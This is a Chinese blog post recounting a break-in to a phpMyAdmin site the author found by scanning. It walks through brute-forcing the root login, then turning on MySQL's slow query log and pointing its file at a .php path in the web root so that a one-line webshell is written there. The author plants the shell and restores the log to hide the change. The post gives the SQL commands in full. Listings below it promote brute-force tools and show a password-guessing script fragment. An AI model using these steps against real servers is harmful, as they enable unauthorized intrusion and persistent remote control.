phpmyadmin爆破工具使用_记一次phpMyAdmin弱口令导致的getshell

最新推荐文章于 2024-08-06 18:15:42 发布
最新推荐文章于 2024-08-06 18:15:42 发布
阅读量1.6k 收藏
点赞数
文章标签: phpmyadmin爆破工具使用

背景:

某日、扫描到的一个地址,打开页面一个hello world,一看网站PHP的,怀疑是装了个PHPstudy或者xampp等这种全家桶

实战

扫一波目录看看

a92fc5e50d6c8810bae18109bf765789.png

发现了一堆好东西,直接先看看PHPmyadmin能不能进得去,这个是最关键的,尝试使用默认口令 root/root无法进去,开始爆破一下看看,发现直接爆出来了,那就不用再www.zip中看了。

e0d1cebb66894572b5258ad379859765.png

爆破成功,就很OK,就很棒,成功登陆

1d60407aa7bb8e8f7470446d7811daf6.png

然后确认网站绝对路径

5d23781ff7654e9b13cbfeaad2bb6086.png

查看是否可以导出文件

ad0ce9b1bdf0ef57b9e8a0f0068d5307.png

发现是不行的。。。那我们就开启慢日志查询,将日志文件给改一改。

SHOW VARIABLES LIKE '%slow_query_log%'  查看现在的日志文件位置

D:MySqlDatabaseWIN-O2RKMNRN8K0-slow.log 记住了,一会马儿传上去了要记得改回来,不然你懂得

21b989b6f29571238618bb28125a87b2.png

开启慢日志查询

set global slow_query_log=1;

修改日志文件位置:

set global slow_query_log_file=’E:/phpStudy/PHPTutorial/WWW/expect-snap.php’;
af9d5de514a42359b6b4cc432c9ce2ec.png

确认一下

d3800078b859f4bd3b2b9789d5089973.png

接下来写入一句话

2200ad809d71c9ae0a3bbb9adf6d5018.png
92b04f43032900293ea012e64cfe4b2c.png

接下来,上传个新马,恢复日志文件,收工。

weixin_39900582
关注
secquan phpmyadmin批量爆破工具_快速收集子域名工具
weixin_39608116的博客
11-05 604
基于网络查询的快速子域名收集工具主要是为了快速收集https://src.edu-info.edu.cn平台的学校子域名等目标写的一些工具集合.下载 taoman 使用命令:python taoman.py -f data/edusrc_school_domains.txttaoman 运行效果图:data 目录:根据网络查询收集的平台上学校的 10 万左右域名,过滤出的域名元数据与...
phpmyadmin中mysql返回_phpMyAdmin利用小结
weixin_28981373的博客
01-28 398
获取版本信息在phpmyadmin根目录下后面添加:READMEChangeLogdoc/html/index.htmlChangechangelog.phpreadme.phpDocumetation.htmlDocumetation.txttranslators.html在fofa上搜索相应站点进行测试:常规getshell手段:1、SQL注入:看看网站是否存在注入利用注入出来的账号密码登录2...
phpMyAdmin多线程批量破解工具
10-16
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的工具,然后自己动手写了一款,多线程批量破解phpMyAdmin工具,支持破解phpMyAdmin 2.11.10到4.4.11版本,如果需要支持变量用户名及密码(如%user%%domain%) 请私人定制。你还在为MySQL的外连功能关闭而烦恼吗,利用phpMyAdmin破解数据库账户密码的工具来了。
phpmyadmin爆破工具
03-28
phpMyAdmin(MySQL)暴力破解工具v1.3,纯净版。
织梦CMS渗透测试:从弱口令到接管webshell
最新发布
xt350488的博客
08-06 1315
关于交流群,后台添加即可401验证,在网络通信和HTTP协议中,特指一种状态码——401 Unauthorized(未经授权)。当客户端尝试访问受保护的资源时,如果未能提供有效的身份验证信息,或者提供的信息不足以获得访问权限,服务器就会返回401状态码,表示请求未被授权。
phpmyadmin爆破程序
05-22
phpmyadmin爆破程序 自己选择自己的字典文件
phpmyadmin批量爆破
01-23
批量查找路径
PHPMyAdmin弱口令猜解【Python脚本】
12-07 2251
PHPMyAdmin弱口令猜解 测试截图:  代码片段 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_list=['root','','admin','123456','password'] def phpMyAdm...
弱口令与暴力破解
周星星的博客
08-21 2630
弱口令,暴力破解,Tomcat弱口令
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9645
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
弱口令及暴力破解(后台)
weixin_43873557的博客
02-06 7046
弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令弱口令指的是仅包含简单数字和字母的口令。 ➢示例 简单数字组合: 000000 111111 11111111 112233 123123 顺序字符组合:abcdef abcabc abc123 a1b2c3 aaa111 临近字符组合:123qwe Qwerty qweasd 特殊含义组合:admin password p@ssword passwd Il
phpMyAdmin暴力破解工具
04-05
一个phpMyAdmin暴力破解工具,字典自己加载
phpmyadmin弱口令批量利用3传(ok)
06-29
phpmyadmin弱口令批量利用3传(ok) 批量执行,仅供网络测试
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
phpmyadmin弱口令检测工具
01-19
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载。
phpmyadmin getshell到提权
KHOST的博客
03-16 631
一. 环境准备: 靶机:win7 32 位。 环境: php:5.45 MYsql:5.5.53 Apache:2.4s 二. 开始攻击。 访问目标站点,发现开启3306 端口, 经过弱口令爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root 1.开始登陆到目标服务器的PhpMyadmin 2.检测MySQL全局变量(generallog、gen...
phpmyadmin爆破之python
m0_65129142的博客
12-21 2125
前言: 在一个秋高气爽的上午,佛系的我在做着佛系的事,正喝着猫屎咖啡(wocao),城里人真会玩,有没有鸡屎coffee。。。突然一个安服的美女给我发来一个微信,我来以为的约我看电影呢,上来一句就说原来的phpmyadmin后台登录爆破工具不行了。 还给我发来个工具的截图: 想着闲着也是蛋疼,那既然美女开口了,那我就看看呗 这个工具是个老古董,现在都神马年代了。phpmyadmin早就更新了,爆破不了,那也是正常的。 正式开始: 废话不多说,我们先开始搭建测试环境,先是下载phpstudy集成环境。 这里
爆破phpmyadmin
m0_51589948的博客
08-08 1238
爆破phpmyadmin 因为是第一次写脚本,所以没有爆破phpmyadmin的思路 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4ccc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值